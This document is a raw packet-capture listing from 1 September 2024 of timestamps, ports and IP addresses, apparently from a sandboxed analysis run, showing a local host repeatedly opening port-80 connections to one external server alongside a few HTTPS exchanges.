Sep 1, 2024 06:28:24.033545017 CEST	80	49762	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:24.033646107 CEST	49762	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:24.033762932 CEST	80	49765	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:24.033829927 CEST	49765	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:24.033957958 CEST	49765	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:24.038377047 CEST	443	49763	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:24.038623095 CEST	49763	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:24.038650990 CEST	443	49763	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:24.038856030 CEST	80	49765	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:24.038997889 CEST	443	49763	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:24.039064884 CEST	49763	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:24.039686918 CEST	443	49763	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:24.039737940 CEST	49763	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:24.039901018 CEST	49763	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:24.039959908 CEST	443	49763	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:24.052702904 CEST	443	49764	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:24.052896976 CEST	49764	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:24.052915096 CEST	443	49764	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:24.053352118 CEST	443	49764	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:24.053416967 CEST	49764	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:24.054120064 CEST	443	49764	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:24.054167986 CEST	49764	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:24.054308891 CEST	49764	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:24.054378986 CEST	443	49764	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:24.168354988 CEST	49763	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:24.168369055 CEST	443	49763	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:24.168402910 CEST	49764	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:24.168421984 CEST	443	49764	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:24.306279898 CEST	49763	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:24.306324959 CEST	49764	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:24.785598040 CEST	80	49765	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:24.786585093 CEST	49765	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:24.818583012 CEST	49765	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:24.823430061 CEST	80	49765	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:25.066498041 CEST	80	49765	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:25.066664934 CEST	49765	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:25.169846058 CEST	49765	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:25.170277119 CEST	49766	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:25.174972057 CEST	80	49765	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:25.175044060 CEST	49765	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:25.175081015 CEST	80	49766	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:25.175249100 CEST	49766	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:25.175249100 CEST	49766	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:25.180102110 CEST	80	49766	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:25.939480066 CEST	80	49766	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:25.939584017 CEST	49766	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:25.944617987 CEST	49766	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:25.949810982 CEST	80	49766	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:26.192711115 CEST	80	49766	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:26.192763090 CEST	49766	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:26.297565937 CEST	49766	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:26.297838926 CEST	49767	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:26.303585052 CEST	80	49767	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:26.303647041 CEST	49767	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:26.303771973 CEST	80	49766	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:26.303783894 CEST	49767	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:26.303813934 CEST	49766	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:26.312263012 CEST	80	49767	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:27.059437037 CEST	80	49767	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:27.063489914 CEST	49767	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:27.063491106 CEST	49767	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:27.068660021 CEST	80	49767	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:27.314143896 CEST	80	49767	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:27.314721107 CEST	49767	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:27.434262991 CEST	49768	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:27.434262991 CEST	49767	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:27.439548016 CEST	80	49768	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:27.439687014 CEST	49768	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:27.439834118 CEST	49768	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:27.439919949 CEST	80	49767	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:27.442903996 CEST	49767	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:27.444910049 CEST	80	49768	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:28.217773914 CEST	80	49768	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:28.217843056 CEST	49768	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:28.218511105 CEST	49768	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:28.224252939 CEST	80	49768	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:28.479645014 CEST	80	49768	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:28.479789019 CEST	49768	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:28.590761900 CEST	49768	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:28.591049910 CEST	49769	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:28.596323013 CEST	80	49769	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:28.596386909 CEST	49769	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:28.596560955 CEST	49769	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:28.596652031 CEST	80	49768	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:28.596695900 CEST	49768	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:28.602929115 CEST	80	49769	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:29.359502077 CEST	80	49769	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:29.359570980 CEST	49769	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:29.360232115 CEST	49769	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:29.374900103 CEST	80	49769	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:29.619127989 CEST	80	49769	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:29.619240999 CEST	49769	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:29.739346027 CEST	49769	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:29.742343903 CEST	49770	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:29.745538950 CEST	80	49769	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:29.745588064 CEST	49769	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:29.747610092 CEST	80	49770	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:29.747665882 CEST	49770	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:29.747852087 CEST	49770	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:29.752998114 CEST	80	49770	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:30.516211987 CEST	80	49770	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:30.516403913 CEST	49770	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:30.516968012 CEST	49770	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:30.522928953 CEST	80	49770	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:30.767627954 CEST	80	49770	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:30.767796040 CEST	49770	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:30.892038107 CEST	49770	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:30.892311096 CEST	49771	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:30.906820059 CEST	80	49770	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:30.906833887 CEST	80	49771	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:30.906871080 CEST	49770	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:30.906915903 CEST	49771	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:30.933826923 CEST	49771	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:30.940377951 CEST	80	49771	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:31.649106026 CEST	80	49771	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:31.649173021 CEST	49771	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:31.764283895 CEST	49771	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:31.769315004 CEST	80	49771	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:32.018194914 CEST	80	49771	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:32.018270969 CEST	49771	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:32.555320978 CEST	49771	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:32.556194067 CEST	49772	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:32.560834885 CEST	80	49771	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:32.560885906 CEST	49771	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:32.561326981 CEST	80	49772	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:32.561407089 CEST	49772	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:32.617850065 CEST	49772	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:32.622771025 CEST	80	49772	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:33.313924074 CEST	80	49772	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:33.314002037 CEST	49772	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:33.314582109 CEST	49772	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:33.319920063 CEST	80	49772	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:33.562179089 CEST	80	49772	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:33.562263012 CEST	49772	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:33.670444012 CEST	49772	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:33.670715094 CEST	49773	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:33.681129932 CEST	80	49773	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:33.681195021 CEST	49773	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:33.681332111 CEST	49773	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:33.681873083 CEST	80	49772	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:33.681943893 CEST	49772	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:33.686738968 CEST	80	49773	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:34.429485083 CEST	80	49773	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:34.434638023 CEST	49773	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:34.435228109 CEST	49773	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:34.440128088 CEST	80	49773	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:34.685169935 CEST	80	49773	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:34.686667919 CEST	49773	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:34.793431044 CEST	49773	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:34.793713093 CEST	49774	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:34.798692942 CEST	80	49774	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:34.798768044 CEST	49774	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:34.798782110 CEST	80	49773	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:34.798830986 CEST	49773	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:34.798963070 CEST	49774	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:34.803833008 CEST	80	49774	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:35.551651001 CEST	80	49774	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:35.552633047 CEST	49774	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:35.553257942 CEST	49774	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:35.558104992 CEST	80	49774	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:35.802583933 CEST	80	49774	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:35.802704096 CEST	49774	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:35.919840097 CEST	49774	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:35.920093060 CEST	49775	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:35.925079107 CEST	80	49775	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:35.925146103 CEST	49775	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:35.925163984 CEST	80	49774	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:35.925213099 CEST	49774	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:35.925349951 CEST	49775	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:35.930416107 CEST	80	49775	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:36.667182922 CEST	80	49775	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:36.667393923 CEST	49775	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:36.668188095 CEST	49775	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:36.673779011 CEST	80	49775	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:36.914449930 CEST	80	49775	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:36.914678097 CEST	49775	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:37.033595085 CEST	49775	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:37.039050102 CEST	80	49775	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:37.039125919 CEST	49775	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:37.040461063 CEST	49776	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:37.045350075 CEST	80	49776	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:37.045424938 CEST	49776	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:37.046829939 CEST	49776	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:37.051620007 CEST	80	49776	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:37.246403933 CEST	443	49757	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:37.246503115 CEST	443	49757	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:37.246557951 CEST	49757	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:37.261940956 CEST	443	49758	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:37.261996031 CEST	443	49758	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:37.262038946 CEST	49758	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:37.790527105 CEST	80	49776	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:37.790597916 CEST	49776	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:37.791276932 CEST	49776	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:37.796705008 CEST	80	49776	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:38.040930033 CEST	80	49776	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:38.041083097 CEST	49776	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:38.153419971 CEST	49776	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:38.154534101 CEST	49777	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:38.158504963 CEST	80	49776	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:38.158557892 CEST	49776	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:38.159317017 CEST	80	49777	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:38.159384966 CEST	49777	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:38.159517050 CEST	49777	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:38.164809942 CEST	80	49777	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:38.922188997 CEST	80	49777	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:38.922243118 CEST	49777	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:38.922816992 CEST	49777	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:38.927706957 CEST	80	49777	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:39.174200058 CEST	80	49777	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:39.174261093 CEST	49777	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:39.281126976 CEST	49777	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:39.281328917 CEST	49778	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:39.286439896 CEST	80	49777	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:39.286521912 CEST	49777	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:39.286644936 CEST	80	49778	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:39.286710024 CEST	49778	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:39.286936998 CEST	49778	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:39.291696072 CEST	80	49778	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:40.027753115 CEST	80	49778	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:40.027811050 CEST	49778	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:40.097448111 CEST	49778	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:40.102502108 CEST	80	49778	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:40.560564041 CEST	80	49778	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:40.560625076 CEST	49778	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:40.562256098 CEST	80	49778	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:40.562299967 CEST	49778	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:40.668298006 CEST	49778	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:40.668572903 CEST	49779	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:40.673621893 CEST	80	49778	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:40.673754930 CEST	80	49779	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:40.673773050 CEST	49778	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:40.673825026 CEST	49779	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:40.673950911 CEST	49779	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:40.679164886 CEST	80	49779	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:41.416515112 CEST	80	49779	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:41.416572094 CEST	49779	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:41.417254925 CEST	49779	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:41.422333956 CEST	80	49779	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:41.664150953 CEST	80	49779	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:41.664202929 CEST	49779	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:41.777622938 CEST	49779	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:41.777985096 CEST	49780	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:41.782816887 CEST	80	49779	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:41.782876015 CEST	49779	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:41.783153057 CEST	80	49780	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:41.783212900 CEST	49780	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:41.783376932 CEST	49780	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:41.788292885 CEST	80	49780	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:42.526021004 CEST	80	49780	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:42.526138067 CEST	49780	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:42.526803017 CEST	49780	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:42.533158064 CEST	80	49780	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:42.774656057 CEST	80	49780	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:42.778649092 CEST	49780	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:42.887442112 CEST	49780	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:42.887759924 CEST	49781	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:42.894638062 CEST	80	49781	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:42.894700050 CEST	49781	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:42.894831896 CEST	49781	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:42.895863056 CEST	80	49780	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:42.895929098 CEST	49780	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:42.899904966 CEST	80	49781	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:43.637886047 CEST	80	49781	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:43.637980938 CEST	49781	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:43.638506889 CEST	49781	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:43.643322945 CEST	80	49781	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:43.894241095 CEST	80	49781	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:43.894437075 CEST	49781	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:44.006513119 CEST	49781	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:44.006835938 CEST	49782	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:44.012119055 CEST	80	49782	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:44.012132883 CEST	80	49781	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:44.012202024 CEST	49781	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:44.012212992 CEST	49782	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:44.013478041 CEST	49782	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:44.018780947 CEST	80	49782	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:44.752712965 CEST	80	49782	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:44.752806902 CEST	49782	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:44.755294085 CEST	49782	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:44.762057066 CEST	80	49782	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:45.003441095 CEST	80	49782	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:45.003638029 CEST	49782	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:45.107724905 CEST	49782	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:45.107925892 CEST	49783	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:45.112890005 CEST	80	49782	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:45.112967968 CEST	49782	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:45.113384008 CEST	80	49783	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:45.113454103 CEST	49783	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:45.113584995 CEST	49783	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:45.118376017 CEST	80	49783	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:45.888034105 CEST	80	49783	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:45.888104916 CEST	49783	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:45.889009953 CEST	49783	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:45.895061016 CEST	80	49783	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:46.142879009 CEST	80	49783	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:46.143285990 CEST	49783	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:46.248476028 CEST	49783	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:46.248737097 CEST	49784	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:46.253535032 CEST	80	49783	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:46.253586054 CEST	49783	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:46.253870010 CEST	80	49784	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:46.253926992 CEST	49784	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:46.254019976 CEST	49784	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:46.259026051 CEST	80	49784	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:47.022620916 CEST	80	49784	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:47.022692919 CEST	49784	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:47.030585051 CEST	49784	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:47.037039995 CEST	80	49784	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:47.281999111 CEST	80	49784	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:47.282062054 CEST	49784	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:47.392015934 CEST	49784	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:47.392303944 CEST	49785	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:47.397420883 CEST	80	49784	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:47.397480965 CEST	49784	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:47.397515059 CEST	80	49785	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:47.397591114 CEST	49785	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:47.397701979 CEST	49785	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:47.402822971 CEST	80	49785	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:48.138727903 CEST	80	49785	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:48.138928890 CEST	49785	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:48.139640093 CEST	49785	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:48.144582987 CEST	80	49785	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:48.387382984 CEST	80	49785	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:48.387670040 CEST	49785	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:48.496999979 CEST	49785	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:48.497168064 CEST	49786	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:48.502595901 CEST	80	49786	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:48.502675056 CEST	49786	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:48.502799988 CEST	49786	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:48.502947092 CEST	80	49785	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:48.503006935 CEST	49785	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:48.508100033 CEST	80	49786	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:49.246798992 CEST	80	49786	185.215.113.19	192.168.2.5
